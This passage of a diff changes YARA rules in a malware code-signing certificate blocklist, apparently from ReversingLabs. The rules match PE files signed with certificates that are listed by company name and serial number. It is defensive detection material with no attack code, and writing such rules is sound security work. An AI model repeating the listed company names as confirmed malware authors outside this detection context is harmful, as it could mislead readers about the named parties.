+		logic_hash = "ef26b4e3c658f53f3048d10bd1b7a2a198cd402e1b7c60e84adadb4f236ccb5d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18535,21 +43200,21 @@ rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "61:02:46:82:93:ba:73:08:d1:7e:fb:43:ad:6b:fb:58" and 1470960000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures [ i ] . serial == "04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "033c9ce3-1676-5ad1-9ec1-08b3ffc585bb"
+		id = "30e3a977-caa3-5ae0-9cd0-6b2ce62ccebd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14350-L14366"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "20ec1e8e0570eb216304fd8453df315a26d9c170224177c325c10cbefc1993fb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7314-L7330"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "484932ddfe614fd5ab22361ab281cda62803c98279f938aa5237237fae6a95d6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18559,21 +43224,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "6d:ed:1a:7f:f6:da:15:2a:98:a5:7a:2f" and 1479094343 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures [ i ] . serial == "0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" and 1614729600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f86fbd6f-1635-56d7-b390-e067f81b8705"
+		id = "d5f810ee-127a-5df0-9299-ffeaddf369ee"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14368-L14384"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e17988cb2503e285cfe2ea74d7bc61c577d828e14fd5d8d8062e469dc75c449e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7332-L7348"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f6be57eb6744ad6d239a0a2cc1ec8c39c9dfd4e4eeb3be9e699516c259f617f0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18583,21 +43248,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and pe.signatures [ i ] . serial == "3c:e6:5e:a0:57:b9:75:d2:c1:7e:af:2c:22:97:b1:eb" and 1528243200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "For M d.o.o." and pe.signatures [ i ] . serial == "4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8fa1f434-2061-5131-9378-58c584eff447"
+		id = "5c2e1f5b-5ff7-51d7-9642-0a527856814c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14386-L14402"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dff7c2d727acca753b030d05028590e1a5577121bb2b4c0dcfcb70b4c9d77cbf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7350-L7366"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "804ab8c44e5d97d8e14f852d61094e90d1e3ace66316781e9e79ab46fc7db8e7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18607,21 +43272,21 @@ rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5d:08:5a:9a:28:85:49:d0:9e:dc:49:41" and 1478757821 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fobos" and pe.signatures [ i ] . serial == "7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" and 1612915200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5344bda2-bc11-5700-a0f7-52792c5bb87a"
+		id = "9d32947c-778f-5e2d-b0b1-4a17a108035e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14404-L14420"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "78c0575a1c9ecf37ef5bac0612c20f96b8641875b0ba786979adc8a77f001a5e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7368-L7384"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b303751e354c346f73368de94b66a960dd12efa0730d2ab14af743810669ac81"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18631,21 +43296,21 @@ rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "7d:20:de:c3:79:7a:1a:c3:06:49:eb:b1:84:26:5b:79" and 1474156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CCL TRADING LIMITED" and pe.signatures [ i ] . serial == "03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" and 1613952000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0a156a49-c737-5bdb-9178-34121af490d6"
+		id = "7e13e257-a264-5a40-b670-889045504acf"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14422-L14438"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7383a7fb31a0a913dff1740015ff702642fbb41d8e5a528a8684c80e66026e9d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7386-L7404"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "21fd7625399c939b6d03100b731709616d206a3811197af2b86991be9d89b4eb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18655,21 +43320,21 @@ rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "18:7d:92:86:10:76:e4:69:b5:b7:a1:9e:2a:9f:d4:ba" and 1476748800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Volpayk LLC" and ( pe.signatures [ i ] . serial == "00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" or pe.signatures [ i ] . serial == "b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" ) and 1611705600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4bb98380-70e5-5ad9-adb2-2e6e10f35258"
+		id = "573a024e-11f0-5cf9-8f0d-a946cdca34c5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14440-L14456"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "39c6efefcbd78d5e08ffd8d3989cab3bdf273a1847b2a961f9e68c9ee95e85b6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7406-L7422"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1a8e72f31039a5a5602d0314f017a2596a23e4a796dc66167dfefc0c9790e3e3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18679,21 +43344,21 @@ rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Funcall" and pe.signatures [ i ] . serial == "19:9a:94:76:fe:ca:3c:00:4f:f8:89:d3:45:45:de:07" and 1138060800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Skalari" and pe.signatures [ i ] . serial == "61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" and 1609372800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e402e3b4-a598-504d-85b8-8c1994cb51fc"
+		id = "690e7919-0344-5bd1-849f-e7bfe2f19276"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14458-L14474"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f849b6899b6766807cfddf99ecb809fe923f35f04de09b62235da352ce6e6e24"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7424-L7442"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ec56bd4783c854efef863050ff729fd99efa98b7b19e04e56a080ee3e75cd90"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18703,21 +43368,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Software Plugin Ltd." and pe.signatures [ i ] . serial == "1e:fe:65" and 1063224491 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAVE MEDIA" and ( pe.signatures [ i ] . serial == "00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" or pe.signatures [ i ] . serial == "8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" ) and 1613433600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f9c18796-995e-58f8-8406-9adcad143ae7"
+		id = "c83918d8-fe90-59dc-8f4e-0e7b10238780"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14476-L14492"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "270b5655a0f54abceb520eaca714ed4f6d4de720883e2759acd5bb2f027dfd2b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7444-L7462"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "794dc27ff9b2588d3f2c31cdb83e53616c604aa41da7d8c895034e1cf9da5dd8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18727,21 +43392,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "0a:f7:e2:b6:a3:de:b9:92:91:dc:af:66" and 1474523112 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S-PRO d.o.o." and ( pe.signatures [ i ] . serial == "00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" or pe.signatures [ i ] . serial == "b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" ) and 1614556800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b4ab6397-5e15-5eb3-9f5d-658c5e3a7e3d"
+		id = "ab84282d-9c35-5e52-a117-1d85c03cc6f4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14494-L14510"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9bcbb84207984b259463482f094bf0f3815f0d74317b6b864dab44769ff5e7e8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7464-L7482"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0360c6760f1018f9388ef5639ab2306879134f33da12677f954fa31b8a71aa16"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18751,21 +43416,21 @@ rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Selig Michael Irfan" and pe.signatures [ i ] . serial == "45:e2:7c:4d:fa:5e:61:75:56:6a:13:b1:b6:dd:f3:f5" and 1465474542 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LoL d.o.o." and ( pe.signatures [ i ] . serial == "00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" or pe.signatures [ i ] . serial == "fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" ) and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8fc73b48-6797-558a-8265-9aca396e899f"
+		id = "facb8bba-a8cc-5b2a-9ef6-ba290cbf9b24"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14512-L14528"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "41e126600aae5646b808ed0a4294faa9a63e47842e9cde4fee9e5e65919af7ee"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7484-L7502"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "feaa8d645eea46c7cbbba4ba86c92184df7515a50f1f905ab818c59079a0c96a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18775,21 +43440,21 @@ rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANAVERIS LIMITED" and pe.signatures [ i ] . serial == "37:d3:6a:4e:61:c0:ac:68:ce:b8:bf:ce:f2:db:f2:83" and 1532476800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tecno trade d.o.o." and ( pe.signatures [ i ] . serial == "00:aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" or pe.signatures [ i ] . serial == "aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" ) and 1611705600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bf800655-cde4-59fa-9574-1055522fe074"
+		id = "300d9e11-9283-500e-9716-5b628ef41853"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14530-L14546"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2787375605310877891ef924268f4660d1c8aa020e00674c1b1d7eb3c4f5b2fb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7504-L7520"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ec031c781ebad7447cfc53ce791aacc8f24e38f039c84e2ee547de64729ae76"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18799,21 +43464,21 @@ rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "We Build Toolbars LLC" and pe.signatures [ i ] . serial == "43:21:de:10:73:82:78:b9:36:83:ca:54:24:07:f1:03" and 1367884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CULNADY LTD LTD" and pe.signatures [ i ] . serial == "19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" and 1608163200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "150773ee-5d85-522d-a693-63bb6a7d1de2"
+		id = "f7894a48-459b-574f-9df3-8505578de42b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14548-L14564"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "24ae1664c35b7947e2e638bf620d9ab572c70df9cdc1403cc00b422a45ff9194"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7522-L7538"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d541ce73e5039541ea221f27cc4d033f0c477e41a148206c26cc39ae07c4caaa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18823,21 +43488,21 @@ rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "2a:6b:2d:f2:10:be:14:f4:e1:8e:10:c7" and 1472095404 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOTO TRADE, dru\\xC5\\xBEba za posredovanje, d.o.o." and pe.signatures [ i ] . serial == "02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" and 1612396800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aabb3a66-5677-5359-9d81-92c8d4c7d910"
+		id = "4ce9b2ce-5dda-5741-bd29-cadae44c3b28"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14566-L14582"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a5b85d13dee51d68af28394ecee3dcc2efe7add4d26c2a8033d1855b33ac6271"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7540-L7558"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a124f80d599051ecd7c17e6818d181ea018db14c9f0514bbcc5b677ba3656d65"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18847,21 +43512,21 @@ rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE
 		importance = 25
 
 	condition:
